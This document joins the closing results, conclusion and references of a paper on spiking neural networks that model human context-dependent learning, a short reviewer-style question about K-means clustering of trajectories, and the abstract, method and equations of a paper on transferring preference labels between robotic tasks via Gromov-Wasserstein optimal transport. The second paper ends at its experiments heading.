in contrast to the vanilla multi-spike model, the lifelong learning model with the OWM algorithm and our multi-spike LPCG perform better on both tasks, because these models retain, to a certain extent, the contextual information learned before. Besides, the third network's performance is much better than the second one, even though the second model applies stricter constraints on the network connections. This may reveal that excessive human constraints can sometimes impair the network's ability to retain memory. Moreover, comparing the accuracy curves with those of the OWM learning algorithm, our multi-spike LPCG method retains the learned tasks to a greater extent under the same circumstances. In particular, the accuracy curve of our method has almost stopped falling, while the curve of the OWM algorithm still shows a downward trend in the last several trials. In the bottom part of Fig. 3(A), we can see the details of the choices made along the two dimensions: the vanilla network trained under blocked training almost ignores the task signal, whereas the OWM model and our SNN-LPCG model keep the choices learned from the first task. Meanwhile, the network trained with our method keeps more details near the category boundary of the first task.

4.3 MODELING THE COGNITIVE CONTROL BEHAVIOR OF HUMANS

We conduct experiments to evaluate the effectiveness of the sluggish neurons. In Fig. 3(B), $\alpha = 0$ means the network is the same as the vanilla network. Combining the results of Fig. 3(B) (top) and 3(B) (left bottom), we conclude that as the level of sluggishness increases, the performance of the network decreases. At the level of neural dynamics, the proportion of task-selective hidden-layer units, which are active only under specific contextual cues, is also reduced. Meanwhile, the choice matrix of the network under interleaved training becomes more and more like the linear model in Fig. 3(B) (mid bottom) as the sluggishness value becomes larger. On the other hand, the same statistics of the network trained on blocked data with local plasticity are hardly affected by sluggishness. Therefore, the "sluggish" neurons are a reasonable assumption. Meanwhile, though the best accuracy obtained by the network trained on interleaved data (without sluggishness) is relatively high, the largest proportion of task-selective units is still lower than that of the network trained on blocked data.

After reasonably modeling human behavior under interleaved data, we can use our method to model the behavior of the human participants in Flesch et al. (2018). To assess the rationality and the biological plausibility of our method, we compare the validation performance and neural dynamics after blocked or interleaved training among the experimental data, the vanilla spiking network, the model proposed in Flesch et al. (2022), and our method. First, as shown in Fig. 4(A), participants trained on blocked data perform better than those trained on interleaved data, while the vanilla network shows the opposite phenomenon. The model of Flesch et al. (2022) and our model both show behavior similar to that of humans. Moreover, participants' behavior shows a congruency effect during training, meaning that they perform better on trials that are congruent between the two tasks than on incongruent trials. This effect is stronger when training on the interleaved data, as shown in Fig. 4(A) (bottom). We can see that the model of Flesch et al. (2022)
and our model both reveal such a congruency effect, while the vanilla network cannot reproduce it because of catastrophic forgetting. When fitting psychometric (sigmoid) functions to the choices made by the human participants and the other three models (supplementary Fig. 1), we see that our model and the reference model have relatively steeper slopes for the irrelevant dimension under interleaved training than under blocked training, as observed in human performance. The vanilla network, by contrast, obtains steeper slopes for the irrelevant dimension under blocked training, because catastrophic forgetting makes the SGD network more easily affected by the irrelevant feature. A similar result can be seen in supplementary Fig. 1 (bottom). We fit the factorized model and the linear model (shown in Fig. 3(B) (mid bottom)) to the choices of the humans and the three networks. Human participants learned a clear boundary between the two tasks/dimensions under blocked data and a relatively vague boundary under interleaved data. The reference network and the network with our method can model such characteristics of human behavior, while the behavior of the vanilla neural network is almost the opposite.

In summary, these tests demonstrate that our method overcomes the catastrophic forgetting of the neural network, and that our framework can effectively model human cognitive behavior, achieving an effect similar to that of the framework proposed by Flesch et al. (2022).

In addition to modeling human behavior patterns, we also compare the neural dynamics of our framework with theirs, to support the biological plausibility of our framework. Although the framework in Flesch et al. (2022) exhibits strong neuron selectivity on the abstract context-dependent task samples (Gaussian "blobs") and reaches relatively high accuracy on the tree pictures (Fig. 4(A) (top)), it shows poor task selectivity when dealing with the tree pictures. Under blocked training, their network has only a very small proportion of task-selective units in the hidden layer (~10%), while in our network a considerable proportion of units is selective to a specific task (~25%). As shown in Fig. 4(B), the proportion of units that are active only for the first task even drops to ~1%. Besides, we plot the average neural activity of task-selective neurons in Fig. 4(B) (bottom). In our network, the task-selective neurons have a higher spiking frequency than the task-agnostic neurons when facing the corresponding task, whereas the reference network exhibits poor activity for the first-task-selective neurons. This phenomenon indicates that our model has better biological plausibility and neural dynamics during human cognitive control.

5 CONCLUSION

Affected by catastrophic forgetting, SNN agents often need to learn samples of all tasks in a randomly mixed way when learning new tasks, which is quite different from human multi-task lifelong learning. Therefore, in this paper, we have extensively explored the role of local synaptic plasticity in the context gating of SNNs, which is more biologically plausible, so as to model human "cognitive control" behavior while minimizing artificial intervention. Taken together, based on the gating in the PFC, we studied and explored whether known local plasticity rules can endow SNNs with the effect of context gating, and implemented single-spike and multi-spike SNNs with context gating trained by local plasticity.
The proposed models are more effective at maintaining past learning experience. Besides, we fitted our network to previously published human behavior data and found that our method reproduces the human behavior under both blocked and interleaved training. Moreover, our model exhibits superior neural dynamics of task-selective neurons compared with previous work.

REFERENCES

Misha B Ahrens, Jennifer M Li, Michael B Orger, Drew N Robson, Alexander F Schier, Florian Engert, and Ruben Portugues. Brain-wide neuronal dynamics during motor adaptation in zebrafish. *Nature*, 485(7399):471–477, 2012.

Jason M Allred and Kaushik Roy. Controlled forgetting: Targeted stimulation and dopaminergic plasticity modulation for unsupervised lifelong learning in spiking neural networks. *Frontiers in Neuroscience*, 14:7, 2020.

D.I. Antonov, K.V. Sviatov, and S. Sukhov. Continuous learning of spiking networks trained with local rules. *Neural Networks*, 155:512–522, 2022. ISSN 0893-6080. doi: https://doi.org/10.1016/j.neunet.2022.09.003.

Mark M Churchland, John P Cunningham, Matthew T Kaufman, Justin D Foster, Paul Nuyujukian, Stephen I Ryu, and Krishna V Shenoy. Neural population dynamics during reaching. *Nature*, 487(7405):51–56, 2012.

Lea Duncker, Laura Driscoll, Krishna V Shenoy, Maneesh Sahani, and David Sussillo. Organizing recurrent network dynamics by task-computation to enable continual learning. *Advances in Neural Information Processing Systems*, 33:14387–14397, 2020.

D. E. Feldman. Timing-based LTP and LTD at vertical inputs to layer II/III pyramidal cells in rat barrel cortex. *Neuron*, 2000.

Timo Flesch, Jan Balaguer, Ronald Dekker, Hamed Nili, and Christopher Summerfield. Comparing continual task learning in minds and machines. *Proceedings of the National Academy of Sciences*, 115(44):E10313–E10322, 2018.

Timo Flesch, David G Nagy, Andrew Saxe, and Christopher Summerfield. Modelling continual learning in humans with hebbian context gating and exponentially decaying task signals. *arXiv preprint arXiv:2203.11560*, 2022.

Matthew D Golub, Patrick T Sadtler, Emily R Oby, Kristin M Quick, Stephen I Ryu, Elizabeth C Tyler-Kabara, Aaron P Batista, Steven M Chase, and Byron M Yu. Learning by neural reassociation. *Nature Neuroscience*, 21(4):607–616, 2018.

Timothée Masquelier, R. Guyonneau, and Simon J. Thorpe. Competitive STDP-based spike pattern learning. *Neural Computation*, 21(5):1259–1276, 2009.

Nicolas Y Masse, Gregory D Grant, and David J Freedman. Alleviating catastrophic forgetting using context-dependent gating and synaptic stabilization. *Proceedings of the National Academy of Sciences*, 115(44):E10467–E10475, 2018.

Earl K Miller, Jonathan D Cohen, et al. An integrative theory of prefrontal cortex function. *Annual Review of Neuroscience*, 24(1):167–202, 2001.

H. Mostafa. Supervised learning based on temporal coding in spiking neural networks. *IEEE Transactions on Neural Networks and Learning Systems*, 29(7):3227–3235, July 2018. ISSN 2162-237X. doi: 10.1109/TNNLS.2017.2726060.

Milad Mozafari, Mohammad Ganjtabesh, Abbas Nowzari-Dalini, Simon J Thorpe, and Timothée Masquelier. Bio-inspired digit recognition using reward-modulated spike-timing-dependent plasticity in deep convolutional networks. *Pattern Recognition*, 94:87–95, 2019.

Erkki Oja. Simplified neuron model as a principal component analyzer. *Journal of Mathematical Biology*, 15(3):267–273, 1982.

Nicolas Skatchkovsky, Hyeryung Jang, and Osvaldo Simeone.
Bayesian continual learning via spiking neural networks. *arXiv preprint arXiv:2208.13723*, 2022. Yujie Wu, Lei Deng, Guoqi Li, Jun Zhu, and Luping Shi. Spatio-temporal backpropagation for training high-performance spiking neural networks. *Frontiers in neuroscience*, 12:331, 2018.
PbpJnyewVM
It seems that the total number of trajectories is 4, and the authors use a K-means clustering to separate them further. I am wondering about the necessity of doing this. Are you labeling the preference among clusters or within clusters?
ZERO-SHOT CROSS-TASK PREFERENCE ALIGNMENT FOR OFFLINE RL VIA OPTIMAL TRANSPORT

Anonymous authors Paper under double-blind review

ABSTRACT

In preference-based Reinforcement Learning (PbRL), aligning rewards with human intentions often necessitates a substantial volume of human-provided labels. Furthermore, the expensive preference data from prior tasks often lacks reusability for subsequent tasks, resulting in repetitive labeling for each new task. In this paper, we propose a novel zero-shot cross-task preference-based RL algorithm that leverages labeled preference data from source tasks to infer labels for target tasks, eliminating the requirement for human queries. Our approach utilizes the Gromov-Wasserstein distance to align trajectory distributions between source and target tasks. The solved optimal transport matrix serves as a correspondence between the trajectories of the two tasks, making it possible to identify corresponding trajectory pairs between tasks and transfer the preference labels. However, learning directly from these inferred labels might introduce noisy or inaccurate reward functions. To this end, we introduce the Robust Preference Transformer, which considers both the reward mean and its uncertainty by modeling rewards as Gaussian distributions. Through extensive empirical validation on robotic manipulation tasks from Meta-World and Robomimic, our approach exhibits strong capabilities in transferring preferences between tasks in a zero-shot way and robustly learns reward functions from noisy labels. Notably, our approach significantly surpasses existing methods in limited-data scenarios. The videos of our method are available on the website: https://sites.google.com/view/pot-rpt.

1 INTRODUCTION

Recent years have witnessed remarkable achievements in Reinforcement Learning (RL), particularly in addressing sequential decision-making problems given a well-defined reward function (Mnih et al., 2013; Silver et al., 2016; Vinyals et al., 2019; Berner et al., 2019). Nevertheless, the practical application of RL algorithms is often impeded by the considerable effort and time required for reward engineering, along with the unexpected and potentially unsafe outcomes of reward hacking, where RL agents exploit reward functions in unanticipated ways. Furthermore, infusing RL learners with societal norms or human values via crafted reward functions remains a great challenge in certain practical deployments.

As a promising alternative, preference-based RL (Christiano et al., 2017) introduces a paradigm shift from traditional RL by learning reward functions based on human preferences between trajectories rather than manually designed reward functions. By directly capturing human intentions, preference-based RL has demonstrated an ability to teach agents novel behaviors that align more closely with human values. However, while the strides made in preference-based RL are significant (Park et al., 2022; Liang et al., 2022; Liu et al., 2022), current algorithms come with their own set of challenges. First, they are heavily reliant on a vast number of online queries to human experts for preference labels for reward and policy learning. This dependency not only increases the time and cost associated with training but also results in data that cannot be recycled or repurposed for new tasks. Each new task encountered demands its own set of human preference labels, creating a cycle of labeling that is both resource-intensive and inefficient.
While Hejna III & Sadigh (2023) leverages prior data to pre-train reward functions via meta-learning and adapts quickly with new-task preference data, the need for millions of pre-collected preference labels and further online queries makes this approach impractical in many scenarios.

Recently, the Gromov-Wasserstein (GW) distance (Mémoli, 2011) has shown effectiveness in a variety of structured data matching problems, such as graphs (Xu et al., 2019) and point clouds (Peyré et al., 2016). The Gromov-Wasserstein distance measures the relational distance and finds the optimal transport plan across different domains. Inspired by this, we consider using the Gromov-Wasserstein distance as an alignment tool between the trajectories of source and target tasks. Given two sets of trajectories from the source and target tasks, respectively, we can identify the corresponding trajectory pairs between tasks based on the solved optimal transport matrix. Hence, a zero-shot cross-task preference-based RL algorithm can be developed that utilizes previously annotated preference data to transfer preference labels across tasks.

In this work, we aim to leverage data collected from existing source tasks to reduce the human labeling cost. We propose to use the Gromov-Wasserstein distance to find the correspondence between trajectories from source tasks and target tasks, and to compute preference labels according to the trajectory alignment, as shown in Figure 1. Our method requires only a small number of preference labels from source tasks and then obtains abundant preference labels for the target task. However, the transferred labels may contain a proportion of incorrect labels, which significantly affect reward and policy learning. To learn robustly from POT labels, we introduce a novel distributional reward modeling approach, which not only captures the average reward but also factors in the reward uncertainty.

In summary, our contributions are three-fold. First, we introduce Preference Optimal Transport (POT), the first zero-shot cross-task preference-based RL approach that utilizes a small amount of preference data from similar tasks to infer pseudo labels via optimal transport. Second, we propose the Robust Preference Transformer (RPT) to ensure robust learning from POT labels. Last, we validate the effectiveness of our approach through experiments on several robotic manipulation tasks of Meta-World (Yu et al., 2020) and Robomimic (Mandlekar et al., 2022). The empirical results demonstrate the strong abilities of our method in zero-shot preference transfer. Moreover, our method significantly outperforms current methods when human preference annotations are scarce.

2 RELATED WORK

**Preference-based Reinforcement Learning.** Preference-based RL algorithms have achieved great success by aligning with human feedback (Christiano et al., 2017; Ibarz et al., 2018; Lee et al., 2021a; Ouyang et al., 2022; Bai et al., 2022). The main challenge of preference-based RL is feedback efficiency, and many recent preference-based RL works have contributed to tackling this problem. To improve feedback efficiency, PEBBLE (Lee et al., 2021b) proposes to use unsupervised exploration for policy pre-training. SURF (Park et al., 2022) infers pseudo labels based on reward confidence to take advantage of unlabeled data, while RUNE (Liang et al., 2022) facilitates exploration guided by reward uncertainty. Meta-Reward-Net (Liu et al., 2022) further improves the efficiency by incorporating the performance of the Q-function during reward learning.
However, most current preference-based RL methods still require a large number of human preference labels for training new tasks, and the data cannot be utilized for learning other tasks. To leverage preference data from source tasks and reduce the amount of human feedback, Hejna III & Sadigh (2023) leverage meta-learning to pre-train the reward function, achieving fast adaptation on new tasks with few human preferences. Despite its success in reducing human cost, it still needs 1.5 million labels for pre-training and further online querying for the new task. Recently, attention has turned to the offline setting. Preference Transformer (PT) (Kim et al., 2023) proposes to use the Transformer architecture to model non-Markovian rewards and outperforms previous methods that model Markovian rewards. IPL (Hejna & Sadigh, 2023) learns policies without reward functions. Nonetheless, PT and IPL still require hundreds of human labels. Our method differs from prior methods in that we only need a small number of human labels from source tasks and can obtain extensive preference labels for the new task.

**Optimal Transport.** Optimal Transport (OT) has been widely studied in domain adaptation (Damodaran et al., 2018; Shen et al., 2018), graph matching (Titouan et al., 2019; Xu et al., 2019), recommender systems (Li et al., 2022), and imitation learning (Fickinger et al., 2022). For example, GWL (Xu et al., 2019) jointly learns node embeddings and performs graph matching. Li et al. (2022) transfer knowledge from the source domain to the target domain by using the Gromov-Wasserstein distance to align the representation distributions. In the context of RL, several imitation learning methods utilize OT to align the agent's and expert's state-action distributions (Dadashi et al., 2021; Cohen et al., 2021; Haldar et al., 2023a; Luo et al., 2023; Haldar et al., 2023b). As a cross-task imitation learning method, GWIL (Fickinger et al., 2022) aligns agent states between source and target tasks and computes pseudo rewards based on the solved optimal transport plan. POT is the first preference-based RL algorithm that leverages optimal transport for cross-task learning. POT does not perform representation-space alignment, which would require additional gradient computation; it directly uses the Gromov-Wasserstein distance to align trajectory distributions between tasks and computes preference labels for the target tasks according to the transport matrix.

**Distributional Modeling for Robust Learning from Noisy Samples.** Traditional representation learning techniques extract features as fixed points. However, such modeling fails to adequately capture data uncertainty, leading to suboptimal performance with noisy data. A series of studies have proposed modeling features as distributions to enhance robustness, as seen in person re-identification (Yu et al., 2019), face recognition (Chang et al., 2020), scene graph generation (Yang et al., 2021), and Vision-Language Pre-training (VLP) (Ji et al., 2022). Specifically, these methods utilize Gaussian distributions rather than fixed points to model features, interpreting the variance as uncertainty. In preference-based RL, Xue et al. (2023) propose an encoder-decoder architecture for reward modeling, which encodes state-action features as Gaussian distributions. Consequently, the features can be manipulated in a latent space, and they are constrained to be close to a prior distribution to stabilize the reward learning process.
In our work, we model reward distributions rather than feature distributions, and to the best of our knowledge we are the first to model reward distributions in preference-based RL.

3 PROBLEM SETTING & PRELIMINARIES

**Problem Setting.** In this paper, we consider preference transfer between tasks that share the same action space. We assume there exists a task distribution \( p(T) \), with each task \( T \) corresponding to a distinct Markov Decision Process (MDP). An MDP is defined by the tuple \((S, A, P, R, \gamma)\), consisting of a state space \( S \), an action space \( A \), a transition function \( P : S \times A \rightarrow S \), a reward function \( R : S \times A \rightarrow \mathbb{R} \), and a discount factor \( \gamma \in (0, 1) \). While the action space \( A \) remains identical across these MDPs, the state space \( S \), the transition function \( P \), the reward function \( R \), and the discount factor \( \gamma \) can differ. In this context, our paper introduces the problem of zero-shot preference transfer. We consider a source task \( S \sim p(T) \) and a target task \( T \sim p(T) \), which means that \( S \) and \( T \) have the same action space. Assume we have \( M \) trajectories \( x_i \) of task \( S \), \( i = 1, \cdots, M \), along with preference labels for all combinations of trajectory pairs \((x_i, x_{i'})\), where \( i, i' = 1, \cdots, M, i < i' \). For task \( T \), there are \( N \) trajectories \( y_j \), \( j = 1, \cdots, N \). The goal of our method is to learn a policy \( \pi(a \mid s) \) for task \( T \) with preference labels transferred from task \( S \).

**Preference-based Reinforcement Learning.** Preference-based RL is assumed to have no access to the ground-truth reward function and instead learns a reward function \( \hat{r}_\psi \) from human preferences. A trajectory segment of length \( H \) is represented as \( x = \{s_1, a_1, \cdots, s_H, a_H\} \). Given a pair of segments \((x^0, x^1)\), a human provides a preference label \( z \in \{0, 1, 0.5\} \), where 0 indicates that \( x^0 \) is preferred over \( x^1 \) (denoted as \( x^0 \succ x^1 \)), 1 denotes the reverse preference, and 0.5 indicates that the two segments are equally preferable. The preference predictor formulated via the Bradley-Terry model (Bradley & Terry, 1952) is:

\[ P_\psi[x^0 \succ x^1] = \frac{\exp \sum_t \hat{r}_\psi(s^0_t, a^0_t)}{\exp \sum_t \hat{r}_\psi(s^0_t, a^0_t) + \exp \sum_t \hat{r}_\psi(s^1_t, a^1_t)}. \tag{1} \]

With a dataset containing trajectory pairs and their labels \( D = \{(x^0, x^1, z)\} \), the parameters of the reward function can be optimized using the following cross-entropy loss:

\[ L_{ce}(\psi) = - \mathbb{E}_{(x^0, x^1, z) \sim D} \left[ (1 - z) \log P_\psi[x^0 \succ x^1] + z \log P_\psi[x^1 \succ x^0] \right]. \tag{2} \]

By aligning the reward function with human preferences, the policy can be learned via RL algorithms from transitions relabeled by \( \hat{r}_\psi \).

**Optimal Transport.** Optimal Transport (OT) aims to find the optimal coupling that transports one distribution into another with minimum cost. Unlike the Wasserstein distance, which measures absolute distances, the Gromov-Wasserstein distance is a relational distance metric incorporating the metric structures of the underlying spaces (Mémoli, 2011; Peyré et al., 2016). Moreover, the Gromov-Wasserstein distance measures distance across different domains, which is beneficial for cross-domain learning.
The mathematical definition of the Gromov-Wasserstein distance is as follows:

**Definition 1.** (Gromov-Wasserstein Distance (Peyré et al., 2016)) Let \((X, d_X, \mu_X)\) and \((Y, d_Y, \mu_Y)\) denote two metric measure spaces, where \(d_X\) and \(d_Y\) represent distance metrics measuring similarity within each task, and \(\mu_X\) and \(\mu_Y\) are Borel probability measures on \(X\) and \(Y\), respectively. For \(p \in [1, \infty]\), the \(p\)-Gromov-Wasserstein distance is defined as:

\[ GW(\mu_X, \mu_Y) = \left( \inf_{\gamma \in \Pi(\mu_X, \mu_Y)} \int_{X \times Y} \int_{X \times Y} L(x, x', y, y')^p \, d\gamma(x, y) \, d\gamma(x', y') \right)^{\frac{1}{p}}, \tag{3} \]

where \(L(x, x', y, y') = |d_X(x, x') - d_Y(y, y')|\) denotes the relational distance function, and \(\Pi(\mu_X, \mu_Y)\) is the set of joint probability distributions with marginal distributions \(\mu_X\) and \(\mu_Y\).

4 METHOD

In this section, we present Preference Optimal Transport (POT), a zero-shot offline preference-based RL algorithm that transfers preferences between tasks via optimal transport. First, we propose to align the trajectories of the source and target tasks using optimal transport and to compute preference labels according to the solved optimal alignment matrix. Second, we introduce the Robust Preference Transformer (RPT), which additionally incorporates reward uncertainty by modeling rewards from a distributional perspective, enabling robust learning from noisy labels.

4.1 PREFERENCE OPTIMAL TRANSPORT

The Gromov-Wasserstein distance shows great ability in aligning structural information, such as the correspondence of edges between two graphs. Therefore, we consider using the Gromov-Wasserstein distance as an alignment metric between the trajectories of the source and target tasks, finding the alignment of paired trajectories between tasks, and inferring preference labels based on this correspondence and the preference labels of the source trajectory pairs. POT aims to identify the correspondence between two sets of trajectories and to transfer the preferences accordingly.

In this paper, we consider the preference transfer problem from a source task \(S\) to a target task \(T\), with their distributions denoted as \(\mu\) and \(\nu\), respectively. Assume we have \(M\) segments with pairwise preference labels \(\{x_i\}_{i=1}^{M}\) from the source task and \(N\) segments \(\{y_j\}_{j=1}^{N}\) from the target task. The trajectories can be represented by the probability measures \(\mu = \sum_{i=1}^{M} u_i \delta_{x_i}\) and \(\nu = \sum_{j=1}^{N} v_j \delta_{y_j}\), where \(\delta_x\) denotes the Dirac function centered on \(x\). The weight vectors \(\{u_i\}_{i=1}^{M}\) and \(\{v_j\}_{j=1}^{N}\) satisfy \(\sum_{i=1}^{M} u_i = 1\) and \(\sum_{j=1}^{N} v_j = 1\), respectively. The empirical Gromov-Wasserstein distance for aligning trajectories between the source and target tasks is expressed as:

\[ GW^2(\mu, \nu) = \min_{T \in \Pi(\mu, \nu)} \sum_{i=1}^{M} \sum_{i'=1}^{M} \sum_{j=1}^{N} \sum_{j'=1}^{N} |d_s(x_i, x_{i'}) - d_t(y_j, y_{j'})|^2 T_{ij} T_{i'j'}, \tag{4} \]

where \(T = [T_{ij}]\) is the optimal transport matrix, \(\Pi(\mu, \nu)\) denotes the set of all couplings between \(\mu\) and \(\nu\), i.e., \(\Pi(\mu, \nu) = \{T \in \mathbb{R}_+^{M \times N} \mid T\mathbf{1}_N = u, T^\top \mathbf{1}_M = v\}\), \(\mathbf{1}_M\) denotes an \(M\)-dimensional vector with all elements equal to one, and \(d_s, d_t\) represent the distance functions within each task, such as the Euclidean or cosine distance.
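To make the alignment step concrete, here is a minimal sketch using the Python Optimal Transport library (which the paper reports using to run the Sinkhorn solver); the trajectory featurization, the entropic regularization strength ε, and the normalization detail are illustrative assumptions. The second helper anticipates the label-transfer step formalized in Eqs. 5–6 below.

```python
import numpy as np
import ot  # Python Optimal Transport (Flamary et al., 2021)

def align_trajectories(src_feats, tgt_feats, epsilon=5e-3):
    """Solve Eq. 4: entropic Gromov-Wasserstein coupling T between M source
    and N target trajectory segments, from intra-task Euclidean distances."""
    M, N = len(src_feats), len(tgt_feats)
    d_s = ot.dist(src_feats, src_feats, metric='euclidean')   # M x M
    d_t = ot.dist(tgt_feats, tgt_feats, metric='euclidean')   # N x N
    u = np.full(M, 1.0 / M)   # uniform source weights u_i
    v = np.full(N, 1.0 / N)   # uniform target weights v_j
    T = ot.gromov.entropic_gromov_wasserstein(
        d_s, d_t, u, v, loss_fun='square_loss', epsilon=epsilon)
    return T                  # T[i, j]: correspondence between x_i and y_j

def transfer_label(T, j, jp, src_labels):
    """Eqs. 5-6: POT label for the target pair (y_j, y_j'). src_labels[i, i']
    holds z(x_i, x_i') for both orderings of every source pair."""
    A = np.outer(T[:, j], T[:, jp])   # Eq. 5: pair matching matrix (M x M)
    np.fill_diagonal(A, 0.0)          # exclude i' == i
    A = A / max(A.sum(), 1e-12)       # keep the label in [0, 1]; cf. Algorithm 1
    return float((A * src_labels).sum())
```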
Upon solving Equation 4, we obtain the optimal transport matrix \(T\) representing the correspondence between the trajectories of the two tasks. Each element \(T_{ij}\) indicates the probability that trajectory \(x_i\) matches trajectory \(y_j\), and the \(j\)-th column represents the correspondence between \(y_j\) and all source trajectories. Therefore, for a pair of trajectories \((y_j, y_{j'})\), we can identify the paired relations based on the optimal transport matrix. We define the trajectory pair matching matrix \(A^{jj'}\) for each \((y_j, y_{j'})\) by multiplying the \(j\)-th column \(T_{:,j}\) and the transpose of the \(j'\)-th column \(T_{:,j'}\):

\[ A^{jj'} = T_{:,j} T_{:,j'}^\top, \tag{5} \]

where \(A^{jj'} \in \mathbb{R}^{M \times M}\), and each element \(A^{jj'}_{ii'}\) of the matrix represents the correspondence of trajectory pair \((y_j, y_{j'})\) with trajectory pair \((x_i, x_{i'})\) from the source task. If we denote the preference label of \((x_i, x_{i'})\) as \(z(x_i, x_{i'})\), then the POT label of \((y_j, y_{j'})\) is computed as follows:

\[ z(y_j, y_{j'}) = \sum_i \sum_{i' \neq i} A^{jj'}_{ii'} z(x_i, x_{i'}), \tag{6} \]

where \(i' \neq i\) because identical segments are equally preferable. In Equation 6, the preference labels of the source-task trajectory pairs are weighted by the trajectory pair correspondence, which means that the preference labels of well-matched trajectory pairs contribute more to the preference transfer. The full procedure for computing POT labels is shown in Algorithm 1 in Appendix A.

Figure 2: Different types of reward modeling. (a) Scalar reward modeling, which only considers scalar rewards. This modeling type is widely used in preference-based RL algorithms (Christiano et al., 2017; Lee et al., 2021b; Kim et al., 2023). (b) Distributional reward modeling, which adds a branch for modeling reward uncertainty in addition to the reward mean.

4.2 ROBUST PREFERENCE TRANSFORMER

Having obtained preference labels transferred according to the optimal transport matrix, we can utilize preference-based RL approaches, such as the offline preference-based RL algorithm PT (Kim et al., 2023), to learn reward functions. However, the labels may include some noise, and learning from such data using previous methods will compromise the accuracy of the rewards and eventually the performance of the policy.

Prior preference-based RL methods represent the rewards as fixed scalar values (Christiano et al., 2017; Lee et al., 2021b; Kim et al., 2023). However, this type of reward modeling is vulnerable to noisy labels. Given a preference dataset comprising trajectory pairs and their preference labels, flipping one preference label \(z\) of a pair \((x^0, x^1)\) into \(1 - z\) will dramatically shift the optimization direction of the reward function on that pair. Thus, if we learn two reward models, one from the clean dataset and one from the data with an inverted label, the two reward models will predict distinct values for that trajectory pair. Subsequently, the inaccurate rewards will affect the performance of the policy. Therefore, a robust preference-based RL algorithm capable of learning from noisy labels is necessary.

**Distributional Reward Modeling.** To improve the robustness of preference-based RL in the presence of noisy labels, we incorporate reward uncertainty and model the rewards from a distributional perspective. Specifically, the rewards are modeled as Gaussian distributions, where the mean represents the estimated reward and the variance signifies the reward uncertainty.
As shown in Figure 2, we design two branches for modeling the reward mean and variance concurrently. Given the extracted embedding of a trajectory segment, represented as \( \{x_t\} \), we split \( \{x_t\} \) into two tensors of the same shape along the embedding dimension. These split tensors are separately processed by the mean and variance branches, ultimately yielding the reward mean \( \{\hat{r}_t\} \) and variance \( \{\sigma^2_t\} \). With the reward mean and variance, we then construct the preference predictor \( P_\psi \) and derive the loss function for distributional reward learning based on Equation 2:

\[ L_{ce} = \mathbb{E}_{(x^0, x^1, z) \sim D} \left[ CE(P_\psi(\{\hat{r}^0_t\}, \{\hat{r}^1_t\}), z) + \lambda \cdot \mathbb{E}_{\beta^0_t \sim p(\beta^0_t), \beta^1_t \sim p(\beta^1_t)} CE(P_\psi(\{\beta^0_t\}, \{\beta^1_t\}), z) \right], \tag{7} \]

where \( \lambda \) balances the reward-mean term \( \{\hat{r}_t\} \) and the stochastic term \( \{\beta_t\} \); \( \{\hat{r}^0_t\} \) and \( \{\beta^0_t\} \) respectively denote the reward means and reward samples of trajectory segment \( x^0 \) (and \( \{\hat{r}^1_t\} \) and \( \{\beta^1_t\} \) for \( x^1 \)); the preference predictor \( P_\psi \) in the first term takes the reward means of the two segments as inputs, while the second \( P_\psi \) uses sampled rewards of the two segments as inputs; and \( CE \) denotes the cross-entropy loss. In practice, the second expectation in Equation 7 is approximated by the mean of \( K \) samples from the distribution of \( \beta \).

**Regularization Loss.** Sampled rewards with large variance make the second term of Equation 7 large. If we directly optimize Equation 7, the variance of all samples will therefore decrease and eventually approach zero. To avoid this variance collapse, we introduce a regularization loss that forces the uncertainty to maintain a level \( \eta \):

\[ L_{reg} = \max(0, \eta - h(N(\hat{r}, \sigma^2))), \tag{8} \]

where \( h(N(\hat{r}, \sigma^2)) = \frac{1}{2} \log(2\pi e \sigma^2) \) is the entropy of the Gaussian distribution. Combining the cross-entropy loss in Equation 7 and the regularization loss in Equation 8, the total loss for RPT training is:

\[ L(\psi) = L_{ce} + \alpha \cdot L_{reg}, \tag{9} \]

where \( \alpha \) is a trade-off factor between the two terms.

**Reparameterization Trick.** Directly sampling \( \beta \) from \( N(\hat{r}, \sigma^2) \) would prevent backpropagation. Hence, we use the reparameterization trick: we first sample a noise \( \epsilon \) from the standard Gaussian distribution \( N(0, 1) \) and compute the sample by:

\[ \beta = \hat{r} + \sigma \cdot \epsilon. \tag{10} \]

Therefore, the reward mean and variance can be learned without being affected by the sampling operation.

4.3 PRACTICAL ALGORITHM

The entire algorithm mainly comprises three stages. First, our approach computes POT labels based on the Gromov-Wasserstein distance alignment; the procedure is shown in Algorithm 1 in Appendix A. In Algorithm 1, we use the Sinkhorn algorithm (Peyré et al., 2016) to solve for the optimal transport matrix, implemented with Python Optimal Transport (Flamary et al., 2021). Second, RPT is trained with the POT labels obtained in the first step. Last, we relabel the transitions in the offline dataset using the trained reward function and train offline RL algorithms, such as Implicit Q-Learning (IQL) (Kostrikov et al., 2022). The full procedure is shown in Algorithm 2 in Appendix A.
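The pieces above assemble into the following minimal PyTorch sketch of the RPT objective (Eqs. 7–10). The two-branch head producing \((\hat{r}_t, \sigma_t)\) is assumed to exist upstream, hard labels \(z \in \{0, 1\}\) are assumed (equal-preference labels would need soft targets), and the entropy in Eq. 8 is read as summed over the segment so that a margin like \(\eta = 100\) is attainable — an interpretation, not a detail stated here.

```python
import math
import torch
import torch.nn.functional as F

def bt_logits(r0, r1):
    """Bradley-Terry logits (Eq. 1): preferences follow a softmax over
    the summed per-step rewards of the two segments."""
    return torch.stack([r0.sum(dim=-1), r1.sum(dim=-1)], dim=-1)

def rpt_loss(mu0, sig0, mu1, sig1, z, lam=0.1, alpha=0.01, eta=100.0, K=5):
    """Total RPT loss (Eq. 9). mu*/sig*: (batch, H) reward means and std
    devs of the two segments; z: (batch,) long preference labels."""
    loss = F.cross_entropy(bt_logits(mu0, mu1), z)      # mean-reward CE term
    for _ in range(K):  # K-sample Monte-Carlo estimate of the Eq. 7 expectation
        b0 = mu0 + sig0 * torch.randn_like(sig0)        # Eq. 10: beta = mu + sigma*eps
        b1 = mu1 + sig1 * torch.randn_like(sig1)
        loss = loss + (lam / K) * F.cross_entropy(bt_logits(b0, b1), z)
    # Eq. 8: hinge on the Gaussian entropy, summed over the segment
    ent0 = (0.5 * torch.log(2 * math.pi * math.e * sig0.pow(2))).sum(dim=-1)
    ent1 = (0.5 * torch.log(2 * math.pi * math.e * sig1.pow(2))).sum(dim=-1)
    reg = F.relu(eta - ent0).mean() + F.relu(eta - ent1).mean()
    return loss + alpha * reg
```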
5 EXPERIMENTS

